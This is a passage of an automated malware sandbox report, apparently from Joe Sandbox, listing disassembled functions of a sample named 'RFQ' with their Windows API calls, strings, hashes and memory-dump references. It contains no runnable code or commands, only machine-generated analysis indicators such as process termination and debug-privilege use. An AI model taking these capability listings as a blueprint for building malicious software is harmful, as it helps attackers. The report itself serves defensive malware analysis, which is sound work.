                                                                                                                                                    • Opcode Fuzzy Hash: 137e8216c72b9690c40b3bf44bb55649a2970acea51c97f0d991abbda3b7e3fa
                                                                                                                                                    • Instruction Fuzzy Hash: 4041E5B0605280DFD7394B288D8DF7A7A96FB82334F598909E08782961DB7CAC40D721
                                                                                                                                                    Function 0076B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0076AEF1,00000B00,?,?), ref: 0076B26C
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,0076AEF1,00000B00,?,?), ref: 0076B273
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0076AEF1,00000B00,?,?), ref: 0076B288
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0076AEF1,00000B00,?,?), ref: 0076B290
                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0076AEF1,00000B00,?,?), ref: 0076B293
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0076AEF1,00000B00,?,?), ref: 0076B2A3
                                                                                                                                                    • GetCurrentProcess.KERNEL32(0076AEF1,00000000,?,0076AEF1,00000B00,?,?), ref: 0076B2AB
                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0076AEF1,00000B00,?,?), ref: 0076B2AE
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0076B2D4,00000000,00000000,00000000), ref: 0076B2C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                    • Opcode ID: b79488e1c3e8ef27dc70c26fc04c68837877165bf32b7cb58d29f8815e9d72bc
                                                                                                                                                    • Instruction ID: 65698e6bdbb47ceb83b18eb9c99d3707fcc07c371b5e57fac9cfce25ae4369f9
                                                                                                                                                    • Opcode Fuzzy Hash: b79488e1c3e8ef27dc70c26fc04c68837877165bf32b7cb58d29f8815e9d72bc
                                                                                                                                                    • Instruction Fuzzy Hash: CE01BBB5240308BFE720AFA5DC4DF6B7BACEB89711F018511FA05DB1A1DAB89C00CB65
                                                                                                                                                    Function 0078C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                                    • Opcode ID: 452082fcea2acd2d77f8fbfe934200918b42ddfe5410191a656d271a61dd7c98
                                                                                                                                                    • Instruction ID: e7fc1d6247f843c8d82eb6130c85d46a06bf096a950f63680c7e761153d29552
                                                                                                                                                    • Opcode Fuzzy Hash: 452082fcea2acd2d77f8fbfe934200918b42ddfe5410191a656d271a61dd7c98
                                                                                                                                                    • Instruction Fuzzy Hash: 94E1E471A40219EFDF11EFA4C885BEE77B5EF48350F148029F905AB281E778AD41CBA0
                                                                                                                                                    Function 007816DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                      • Part of subcall function 0074C6F4: _wcscpy.LIBCMT ref: 0074C717
                                                                                                                                                    • _wcstok.LIBCMT ref: 0078184E
                                                                                                                                                    • _wcscpy.LIBCMT ref: 007818DD
                                                                                                                                                    • _memset.LIBCMT ref: 00781910
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                    • String ID: X$p2~l2~
                                                                                                                                                    • API String ID: 774024439-2553291027
                                                                                                                                                    • Opcode ID: b6b1cd87dcbd73d175b008c713706ff067a9e9ce8bc4fcd194a6b97d113951cf
                                                                                                                                                    • Instruction ID: 4676cc9426c8c7c4419c95abc65c58a85e8f4d33f92215a446fb5fce788134d2
                                                                                                                                                    • Opcode Fuzzy Hash: b6b1cd87dcbd73d175b008c713706ff067a9e9ce8bc4fcd194a6b97d113951cf
                                                                                                                                                    • Instruction Fuzzy Hash: C3C17171504340DFD724EF24C889A9AB7E4BF85350F40892DF999972A2DB78ED45CB82
                                                                                                                                                    Function 007386C2 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 155COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: Q\E$[$\$\$]$^
                                                                                                                                                    • API String ID: 2102423945-1026548749
                                                                                                                                                    • Opcode ID: baf6e6eaa100a409e8302963b0e40be5c3ce9ceb5cbaaec8a8be08f778b5148f
                                                                                                                                                    • Instruction ID: 27cba29e4d223d9c19d1017c3494c01dc13bc711e622b204e0c29ca7e679a0fc
                                                                                                                                                    • Opcode Fuzzy Hash: baf6e6eaa100a409e8302963b0e40be5c3ce9ceb5cbaaec8a8be08f778b5148f
                                                                                                                                                    • Instruction Fuzzy Hash: B9517471D00209DBDF74CFD8C8816ADB7B2BF95314F248266D814A7252D7389D85CB51
                                                                                                                                                    Function 00799A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00799B19
                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00799B2D
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00799B47
                                                                                                                                                    • _wcscat.LIBCMT ref: 00799BA2
                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00799BB9
                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00799BE7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                                                                                    • String ID: SysListView32
                                                                                                                                                    • API String ID: 307300125-78025650
                                                                                                                                                    • Opcode ID: 628e9c1e075b0aac0f08cbdaf48e12a8726c1c5616b49f321382aa1b036fa02d
                                                                                                                                                    • Instruction ID: 80ee38664bb079e760f880f8d2abe50b4784f7bb1fdca10b25a5447dd575fc32
                                                                                                                                                    • Opcode Fuzzy Hash: 628e9c1e075b0aac0f08cbdaf48e12a8726c1c5616b49f321382aa1b036fa02d
                                                                                                                                                    • Instruction Fuzzy Hash: 1A419371900348EBEF219F68DC85FEE77B8EF08350F10452AFA45A7291D6799D84CB64
                                                                                                                                                    Function 0079172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00776532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00776554
                                                                                                                                                      • Part of subcall function 00776532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00776564
                                                                                                                                                      • Part of subcall function 00776532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007765F9
                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0079179A
                                                                                                                                                    • GetLastError.KERNEL32 ref: 007917AD
                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007917D9
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00791855
                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00791860
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00791895
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                    • Opcode ID: 77b2ae6cdd9e5fe20abd9ed0c95ce8fcb1a009f927b11bcd28d29dd2860bccad
                                                                                                                                                    • Instruction ID: 5f72b915fb25c291b93634ff9aaa03caf284df51ad61282b1ab4ecec50e0a466
                                                                                                                                                    • Opcode Fuzzy Hash: 77b2ae6cdd9e5fe20abd9ed0c95ce8fcb1a009f927b11bcd28d29dd2860bccad
                                                                                                                                                    • Instruction Fuzzy Hash: 0641AC72600206EFDF15EF54D8A9F6DB7A1AF08310F45C058F9069F2C2DBBCA9108B61
                                                                                                                                                    Function 00775819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 007758B8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconLoad
                                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                                                    • Opcode ID: 67064a35d8fca9e660c1e1548a589b91a34614b52709be390d15f1ef6cca91ed
                                                                                                                                                    • Instruction ID: 0cd981f7168ff2e3331f98e21e3d7b230507305126cc5286c73afe960a456eca
                                                                                                                                                    • Opcode Fuzzy Hash: 67064a35d8fca9e660c1e1548a589b91a34614b52709be390d15f1ef6cca91ed
                                                                                                                                                    • Instruction Fuzzy Hash: DB110D71209742FBEF115B659C86EAA339C9F19350B20403AF904E62C1EBECAA1042A6
                                                                                                                                                    Function 0077A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0077A806
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArraySafeVartype
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1725837607-0
                                                                                                                                                    • Opcode ID: 50554411a9183ab837a5924df6e5278a74217302710fa9215cd69ccf04bec82b
                                                                                                                                                    • Instruction ID: b0f41bda6928265c51a760f3a9c8af8f15696a7d1df4cb475719b9080ab54d69
                                                                                                                                                    • Opcode Fuzzy Hash: 50554411a9183ab837a5924df6e5278a74217302710fa9215cd69ccf04bec82b
                                                                                                                                                    • Instruction Fuzzy Hash: B5C17B75A0521AEFEF14CF98C485BAEB7B4FF49351F20C069E609E7241D738A941CB92
                                                                                                                                                    Function 00776B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00776B63
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00776B6A
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00776B80
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00776B87
                                                                                                                                                    • _wprintf.LIBCMT ref: 00776BAD
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00776BCB
                                                                                                                                                    Strings
                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00776BA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                                                    • Opcode ID: 70f567a7cab9ef7b4e8fb9117b02d057db5a5ab60707d3861f32b73f637f7b09
                                                                                                                                                    • Instruction ID: 8bf899317b1dc809efd4988ec415421d2d67cd0dc9e55791726bf788fc18c2e8
                                                                                                                                                    • Opcode Fuzzy Hash: 70f567a7cab9ef7b4e8fb9117b02d057db5a5ab60707d3861f32b73f637f7b09
                                                                                                                                                    • Instruction Fuzzy Hash: 780136F690020CBFEB21A7A49D89FF7776CDB08345F0085A5B755D2051EA789E848F74
                                                                                                                                                    Function 00792B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00793C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00792BB5,?,?), ref: 00793C1D
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00792BF6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharConnectRegistryUpper
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2595220575-0
                                                                                                                                                    • Opcode ID: 17efbaedcc4d651aeb6971561924ed9e47fd5852ead012cb455c24d3a390fc64
                                                                                                                                                    • Instruction ID: ee21ccc4562b9f80ec953b6e3607292afabce452e858af08e75a2cf5f5e52c6d
                                                                                                                                                    • Opcode Fuzzy Hash: 17efbaedcc4d651aeb6971561924ed9e47fd5852ead012cb455c24d3a390fc64
                                                                                                                                                    • Instruction Fuzzy Hash: E3916B71204201EFDB15EF14D895F6EB7E5AF48310F04881DF99697292DB38E906CB52
                                                                                                                                                    Function 007895BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • select.WSOCK32 ref: 00789691
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0078969E
                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 007896C8
                                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007896E9
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 007896F8
                                                                                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 007897AA
                                                                                                                                                    • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,007CDC00), ref: 00789765
                                                                                                                                                      • Part of subcall function 0076D2FF: _strlen.LIBCMT ref: 0076D309
                                                                                                                                                    • _strlen.LIBCMT ref: 00789800
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3480843537-0
                                                                                                                                                    • Opcode ID: beee084eba7869c93645375da9bbaa4228fac24f0155f1ba3b8b6d5801b9e0b5
                                                                                                                                                    • Instruction ID: db3c292f0ced8581431eef175874fda3a8fe6de69e895fec935f22d647b315a4
                                                                                                                                                    • Opcode Fuzzy Hash: beee084eba7869c93645375da9bbaa4228fac24f0155f1ba3b8b6d5801b9e0b5
                                                                                                                                                    • Instruction Fuzzy Hash: B481AC71504200EFD724EF64CC89F6BB7A8EB89710F144A1DF6559B292EB38DD04CBA2
                                                                                                                                                    Function 0075A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __mtinitlocknum.LIBCMT ref: 0075A991
                                                                                                                                                      • Part of subcall function 00757D7C: __FF_MSGBANNER.LIBCMT ref: 00757D91
                                                                                                                                                      • Part of subcall function 00757D7C: __NMSG_WRITE.LIBCMT ref: 00757D98
                                                                                                                                                      • Part of subcall function 00757D7C: __malloc_crt.LIBCMT ref: 00757DB8
                                                                                                                                                    • __lock.LIBCMT ref: 0075A9A4
                                                                                                                                                    • __lock.LIBCMT ref: 0075A9F0
                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,007E6DE0,00000018,00765E7B,?,00000000,00000109), ref: 0075AA0C
                                                                                                                                                    • EnterCriticalSection.KERNEL32(8000000C,007E6DE0,00000018,00765E7B,?,00000000,00000109), ref: 0075AA29
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(8000000C), ref: 0075AA39
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1422805418-0
                                                                                                                                                    • Opcode ID: b9716753247762680d9657e96432c187dd1afc9fe2c4277f1cabf8b2613fff26
                                                                                                                                                    • Instruction ID: c89aefde85fbf841f8ddcd9d08063d052d473d9faf1bf522d47a50c96a35711a
                                                                                                                                                    • Opcode Fuzzy Hash: b9716753247762680d9657e96432c187dd1afc9fe2c4277f1cabf8b2613fff26
                                                                                                                                                    • Instruction Fuzzy Hash: 6E412B71900205EBEB14DF68D9447D8B7A06F01326F10C339EC25AB2D2EBFC9949CB95
                                                                                                                                                    Function 00798ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00798EE4
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00798EEC
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00798EF7
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00798F03
                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00798F3F
                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00798F50
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0079BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00798F8A
                                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00798FAA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
